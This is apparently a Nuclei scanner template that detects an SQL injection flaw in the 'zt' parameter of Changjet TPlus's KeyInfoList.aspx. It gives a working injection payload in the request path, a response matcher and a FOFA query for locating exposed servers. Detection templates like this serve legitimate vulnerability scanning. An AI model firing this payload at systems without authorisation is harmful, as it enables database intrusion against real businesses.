id: changjet-tplus-keyinfolist-sqli

info:
  name: Changjet TPlus KeyInfoList.aspx - SQL Injection
  author: Co5mos
  severity: critical
  description: An SQL injection vulnerability in KeyInfoList.aspx allows attackers to execute arbitrary SQL commands through the 'zt' parameter.
  reference:
    - https://github.com/wy876/POC/commit/03a551c24799a4d99f6c1f60b27fbcea305bc4f8
  metadata:
    max-request: 1
    verified: true
    fofa-query: app="畅捷通-TPlus"
  tags: 畅捷通-TPlus

http:
  - method: GET
    path:
      - "{{BaseURL}}/tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5'%2C'999999999')))--+"

    matchers:
      - type: word
        part: body
        words:
          - "c8c605999f3d8352d7bb792cf3fdb25"